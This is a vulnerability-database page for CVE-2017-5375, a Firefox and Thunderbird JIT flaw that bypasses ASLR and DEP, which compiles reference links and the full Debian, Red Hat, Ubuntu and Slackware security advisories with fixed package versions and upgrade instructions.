CVE-2017-5375
CVSS: N/A
Published: 2018-06-11 17:29:02
Last modified: 2018-06-12 21:29:03

[Original] JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.


[CNNVD] CNNVD data not yet available.


[Machine translation] Translation not yet available.

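- CVSS (base score)

CVSS not yet available

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5375
(Official data source) NVD

- Other links and resources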

http://rhn.redhat.com/errata/RHSA-2017-0190.html
(UNKNOWN)  REDHAT  RHSA-2017:0190
http://rhn.redhat.com/errata/RHSA-2017-0238.html
(UNKNOWN)  REDHAT  RHSA-2017:0238
http://www.securityfocus.com/bid/95757
(UNKNOWN)  BID  95757
http://www.securitytracker.com/id/1037693
(UNKNOWN)  SECTRACK  1037693
https://bugzilla.mozilla.org/show_bug.cgi?id=1325200
(UNKNOWN)  CONFIRM  https://bugzilla.mozilla.org/show_bug.cgi?id=1325200
https://security.gentoo.org/glsa/201702-13
(UNKNOWN)  GENTOO  GLSA-201702-13
https://security.gentoo.org/glsa/201702-22
(UNKNOWN)  GENTOO  GLSA-201702-22
https://www.debian.org/security/2017/dsa-3771
(UNKNOWN)  DEBIAN  DSA-3771
https://www.debian.org/security/2017/dsa-3832
(UNKNOWN)  DEBIAN  DSA-3832
https://www.exploit-db.com/exploits/42327/
(UNKNOWN)  EXPLOIT-DB  42327
https://www.exploit-db.com/exploits/44293/
(UNKNOWN)  EXPLOIT-DB  44293
https://www.exploit-db.com/exploits/44294/
(UNKNOWN)  EXPLOIT-DB  44294
https://www.mozilla.org/security/advisories/mfsa2017-01/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-01/
https://www.mozilla.org/security/advisories/mfsa2017-02/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-02/
https://www.mozilla.org/security/advisories/mfsa2017-03/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-03/

- Vulnerability information (F140736)

Debian Security Advisory 3771-1 (PacketStormID:F140736)
2017-01-26 00:00:00
Debian  debian.org
advisory,web,arbitrary,info disclosure
linux,debian
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396

Debian Linux Security Advisory 3771-1 - Multiple security issues have been found in the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other implementation errors may lead to the execution of arbitrary code, information disclosure or privilege escalation.

-------------------------------------------------------------------------
Debian Security Advisory DSA-3771-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
January 25, 2017                      https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378 
                 CVE-2017-5380 CVE-2017-5383 CVE-2017-5386 CVE-2017-5390 
                 CVE-2017-5396

Multiple security issues have been found in the Mozilla Firefox web
browser: Memory safety errors, use-after-frees and other implementation
errors may lead to the execution of arbitrary code, information
disclosure or privilege escalation.

For the stable distribution (jessie), these problems have been fixed in
version 45.7.0esr-1~deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 45.7.0esr-1 of firefox-esr and version 51.0-1 of firefox.

We recommend that you upgrade your firefox-esr packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
    

- Vulnerability information (F140721)

Red Hat Security Advisory 2017-0190-01 (PacketStormID:F140721)
2017-01-25 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396

Red Hat Security Advisory 2017-0190-01 - Mozilla Firefox is an open source web browser. This update upgrades Firefox to version 45.7.0 ESR. Security Fix: Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2017:0190-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2017-0190.html
Issue date:        2017-01-25
CVE Names:         CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 
                   CVE-2017-5378 CVE-2017-5380 CVE-2017-5383 
                   CVE-2017-5386 CVE-2017-5390 CVE-2017-5396 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 5, Red
Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open source web browser.

This update upgrades Firefox to version 45.7.0 ESR.

Security Fix(es):

* Multiple flaws were found in the processing of malformed web content. A
web page containing malicious content could cause Firefox to crash or,
potentially, execute arbitrary code with the privileges of the user running
Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,
Christian Holler, Gary Kwong, André Bargull, Jan de Mooij, Tom Schuster,
and Oriol, Rh0, Nicolas Grégoire, and Jerri Rice as the original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1415924 - CVE-2017-5373 Mozilla: Memory safety bugs fixed in Firefox 51 and Firefox ESR 45.7 (MFSA 2017-01)
1416271 - CVE-2017-5375 Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
1416272 - CVE-2017-5376 Mozilla: Use-after-free in XSL (MFSA 2017-02)
1416273 - CVE-2017-5378 Mozilla: Pointer and frame data leakage of Javascript objects (MFSA 2017-02)
1416274 - CVE-2017-5380 Mozilla: Potential use-after-free during DOM manipulations (MFSA 2017-02)
1416279 - CVE-2017-5390 Mozilla: Insecure communication methods in Developer Tools JSON viewer (MFSA 2017-02)
1416280 - CVE-2017-5396 Mozilla: Use-after-free with Media Decoder (MFSA 2017-02)
1416281 - CVE-2017-5383 Mozilla: Location bar spoofing with unicode characters (MFSA 2017-02)
1416282 - CVE-2017-5386 Mozilla: WebExtensions can use data: protocol to affect other extensions (MFSA 2017-02)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
firefox-45.7.0-1.el5_11.src.rpm

i386:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-45.7.0-1.el5_11.x86_64.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
firefox-45.7.0-1.el5_11.src.rpm

i386:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm

ppc:
firefox-45.7.0-1.el5_11.ppc64.rpm
firefox-debuginfo-45.7.0-1.el5_11.ppc64.rpm

s390x:
firefox-45.7.0-1.el5_11.s390x.rpm
firefox-debuginfo-45.7.0-1.el5_11.s390x.rpm

x86_64:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-45.7.0-1.el5_11.x86_64.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

ppc64:
firefox-45.7.0-1.el6_8.ppc64.rpm
firefox-debuginfo-45.7.0-1.el6_8.ppc64.rpm

s390x:
firefox-45.7.0-1.el6_8.s390x.rpm
firefox-debuginfo-45.7.0-1.el6_8.s390x.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

aarch64:
firefox-45.7.0-1.el7_3.aarch64.rpm
firefox-debuginfo-45.7.0-1.el7_3.aarch64.rpm

ppc64:
firefox-45.7.0-1.el7_3.ppc64.rpm
firefox-debuginfo-45.7.0-1.el7_3.ppc64.rpm

ppc64le:
firefox-45.7.0-1.el7_3.ppc64le.rpm
firefox-debuginfo-45.7.0-1.el7_3.ppc64le.rpm

s390x:
firefox-45.7.0-1.el7_3.s390x.rpm
firefox-debuginfo-45.7.0-1.el7_3.s390x.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-5373
https://access.redhat.com/security/cve/CVE-2017-5375
https://access.redhat.com/security/cve/CVE-2017-5376
https://access.redhat.com/security/cve/CVE-2017-5378
https://access.redhat.com/security/cve/CVE-2017-5380
https://access.redhat.com/security/cve/CVE-2017-5383
https://access.redhat.com/security/cve/CVE-2017-5386
https://access.redhat.com/security/cve/CVE-2017-5390
https://access.redhat.com/security/cve/CVE-2017-5396
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox-esr/#firefoxesr45.7

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.

- Vulnerability information (F140770)

Ubuntu Security Notice USN-3165-1 (PacketStormID:F140770)
2017-01-30 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary,javascript,xss
linux,ubuntu
CVE-2016-9893,CVE-2016-9895,CVE-2016-9897,CVE-2016-9898,CVE-2016-9899,CVE-2016-9900,CVE-2016-9904,CVE-2016-9905,CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396

Ubuntu Security Notice 3165-1 - Multiple memory safety issues were discovered in Thunderbird. If a user were tricked in to opening a specially crafted message, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. Andrew Krasichkov discovered that event handlers on <marquee> elements were executed despite a Content Security Policy that disallowed inline JavaScript. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to conduct cross-site scripting attacks. Various other issues were also addressed.

===========================================================================
Ubuntu Security Notice USN-3165-1
January 28, 2017

thunderbird vulnerabilities
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple memory safety issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted message, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)

Andrew Krasichkov discovered that event handlers on <marquee> elements
were executed despite a Content Security Policy (CSP) that disallowed
inline JavaScript. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to conduct cross-site scripting (XSS) attacks.
(CVE-2016-9895)

A memory corruption issue was discovered in WebGL in some circumstances.
If a user were tricked in to opening a specially crafted website in a
browsing context, an attacker could potentially exploit this to cause a
denial of service via application crash, or execute arbitrary code.
(CVE-2016-9897)

A use-after-free was discovered when manipulating DOM subtrees in the
Editor. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2016-9898)

A use-after-free was discovered when manipulating DOM events and audio
elements. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2016-9899)

It was discovered that external resources that should be blocked when
loading SVG images can bypass security restrictions using data: URLs. An
attacker could potentially exploit this to obtain sensitive information.
(CVE-2016-9900)

Jann Horn discovered that JavaScript Map/Set were vulnerable to timing
attacks. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
obtain sensitive information across domains. (CVE-2016-9904)

A crash was discovered in EnumerateSubDocuments while adding or removing
sub-documents. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to execute arbitrary code. (CVE-2016-9905)

JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5375)

Nicolas Grégoire discovered a use-after-free when manipulating XSL in
XSLT documents in some circumstances. If a user were tricked in to opening
a specially crafted website in a browsing context, an attacker could
potentially exploit this to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5376)

Jann Horn discovered that an object's address could be discovered through
hashed codes of JavaScript objects shared between pages. If a user were
tricked in to opening a specially crafted website in a browsing context,
an attacker could potentially exploit this to obtain sensitive
information. (CVE-2017-5378)

A use-after-free was discovered during DOM manipulation of SVG content in
some circumstances. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to cause a denial of service via application crash, or
execute arbitrary code. (CVE-2017-5380)

Armin Razmjou discovered that certain unicode glyphs do not trigger
punycode display. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to spoof the URL bar contents. (CVE-2017-5383)

Jerri Rice discovered insecure communication methods in the Dev Tools JSON
Viewer. An attacker could potentially exploit this to gain additional
privileges. (CVE-2017-5390)

Filipe Gomes discovered a use-after-free in the media decoder in some
circumstances. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  thunderbird                     1:45.7.0+build1-0ubuntu0.16.10.1

Ubuntu 16.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.14.04.1

Ubuntu 12.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.12.04.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3165-1
  CVE-2016-9893, CVE-2016-9895, CVE-2016-9897, CVE-2016-9898,
  CVE-2016-9899, CVE-2016-9900, CVE-2016-9904, CVE-2016-9905,
  CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
  CVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396

Package Information:
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.16.10.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.14.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.12.04.1



    

- Vulnerability information (F140769)

Ubuntu Security Notice USN-3175-1 (PacketStormID:F140769)
2017-01-30 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2017-5373,CVE-2017-5374,CVE-2017-5375,CVE-2017-5376,CVE-2017-5377,CVE-2017-5378,CVE-2017-5379,CVE-2017-5380,CVE-2017-5381,CVE-2017-5382,CVE-2017-5383,CVE-2017-5384,CVE-2017-5385,CVE-2017-5386,CVE-2017-5387,CVE-2017-5388,CVE-2017-5389,CVE-2017-5390,CVE-2017-5391,CVE-2017-5393,CVE-2017-5396

Ubuntu Security Notice 3175-1 - Multiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. JIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Various other issues were also addressed.

===========================================================================
Ubuntu Security Notice USN-3175-1
January 27, 2017

firefox vulnerabilities
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

Firefox could be made to crash or run programs as your login if it
opened a malicious website.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)

JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5375)

Nicolas Grégoire discovered a use-after-free when manipulating XSL in
XSLT documents in some circumstances. If a user were tricked in to opening
a specially crafted website, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5376)

Atte Kettunen discovered a memory corruption issue in Skia in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5377)

Jann Horn discovered that an object's address could be discovered through
hashed codes of JavaScript objects shared between pages. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit this to obtain sensitive information. (CVE-2017-5378)

A use-after-free was discovered in Web Animations in some circumstances.
If a user were tricked in to opening a specially crafted website, an
attacker could potentially exploit this to cause a denial of service via
application crash, or execute arbitrary code. (CVE-2017-5379)

A use-after-free was discovered during DOM manipulation of SVG content in
some circumstances. If a user were tricked in to opening a specially
crafted website, an attacker could potentially exploit this to cause a
denial of service via application crash, or execute arbitrary code.
(CVE-2017-5380)

Jann Horn discovered that the "export" function in the Certificate Viewer
can force local filesystem navigation when the Common Name contains
slashes. If a user were tricked in to exporting a specially crafted
certificate, an attacker could potentially exploit this to save content
with arbitrary filenames in unsafe locations. (CVE-2017-5381)

Jerri Rice discovered that the Feed preview for RSS feeds can be used to
capture errors and exceptions generated by privileged content. An attacker
could potentially exploit this to obtain sensitive information.
(CVE-2017-5382)

Armin Razmjou discovered that certain unicode glyphs do not trigger
punycode display. An attacker could potentially exploit this to spoof the
URL bar contents. (CVE-2017-5383)

Paul Stone and Alex Chapman discovered that the full URL path is exposed
to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a
user has enabled Web Proxy Auto Detect (WPAD), an attacker could
potentially exploit this to obtain sensitive information. (CVE-2017-5384)

Muneaki Nishimura discovered that data sent in multipart channels will
ignore the Referrer-Policy response headers. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2017-5385)

Muneaki Nishimura discovered that WebExtensions can affect other
extensions using the data: protocol. If a user were tricked in to
installing a specially crafted addon, an attacker could potentially
exploit this to obtain sensitive information or gain additional
privileges. (CVE-2017-5386)

Mustafa Hasan discovered that the existence of local files can be
determined using the <track> element. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2017-5387)

Cullen Jennings discovered that WebRTC can be used to generate large
amounts of UDP traffic. An attacker could potentially exploit this to
conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)

Kris Maglione discovered that WebExtensions can use the mozAddonManager
API by modifying the CSP headers on sites with the appropriate permissions
and then using host requests to redirect script loads to a malicious site.
If a user were tricked in to installing a specially crafted addon, an
attacker could potentially exploit this to install additional addons
without user permission. (CVE-2017-5389)

Jerri Rice discovered insecure communication methods in the Dev Tools JSON
Viewer. An attacker could potentially exploit this to gain additional
privileges. (CVE-2017-5390)

Jerri Rice discovered that about: pages used by content can load
privileged about: pages in iframes. An attacker could potentially exploit
this to gain additional privileges, in combination with a
content-injection bug in one of those about: pages. (CVE-2017-5391)

Stuart Colville discovered that mozAddonManager allows for the
installation of extensions from the CDN for addons.mozilla.org, a publicly
accessible site. If a user were tricked in to installing a specially
crafted addon, an attacker could potentially exploit this, in combination
with a cross-site scripting (XSS) attack on Mozilla's AMO sites, to
install additional addons. (CVE-2017-5393)

Filipe Gomes discovered a use-after-free in the media decoder in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  firefox                         51.0.1+build2-0ubuntu0.16.10.1

Ubuntu 16.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.14.04.1

Ubuntu 12.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.12.04.1

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3175-1
  CVE-2017-5373, CVE-2017-5374, CVE-2017-5375, CVE-2017-5376,
  CVE-2017-5377, CVE-2017-5378, CVE-2017-5379, CVE-2017-5380,
  CVE-2017-5381, CVE-2017-5382, CVE-2017-5383, CVE-2017-5384,
  CVE-2017-5385, CVE-2017-5386, CVE-2017-5387, CVE-2017-5388,
  CVE-2017-5389, CVE-2017-5390, CVE-2017-5391, CVE-2017-5393,
  CVE-2017-5396

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.10.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.14.04.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.12.04.1



    

- Vulnerability information (F140768)

Slackware Security Advisory - mozilla-thunderbird Updates (PacketStormID:F140768)
2017-01-30 00:00:00
Slackware Security Team  slackware.com
advisory
linux,slackware
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396

Slackware Security Advisory - New mozilla-thunderbird packages are available for Slackware 14.1, 14.2, and -current to fix security issues.

[slackware-security]  mozilla-thunderbird (SSA:2017-026-01)

New mozilla-thunderbird packages are available for Slackware 14.1, 14.2,
and -current to fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5376
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5378
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5380
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5390
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5396
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5383
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5386
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5373
  (* Security fix *)
+--------------------------+


Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-45.7.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-45.7.0-x86_64-1.txz


MD5 signatures:
+-------------+

Slackware 14.1 package:
b944bea9c98775dc812beb3151933382  mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
71f006a9aed72154ba8d49e2e30d05b0  mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz

Slackware 14.2 package:
b0b51e73c2d9f489609b66a8719baac2  mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
8c764b5f61595020e3cd5c320c1f9116  mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz

Slackware -current package:
57c3693787752848428469ec69996f58  xap/mozilla-thunderbird-45.7.0-i586-1.txz

Slackware x86_64 -current package:
549218c6ad3bc9e9cd5f103072a1b1db  xap/mozilla-thunderbird-45.7.0-x86_64-1.txz


Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz


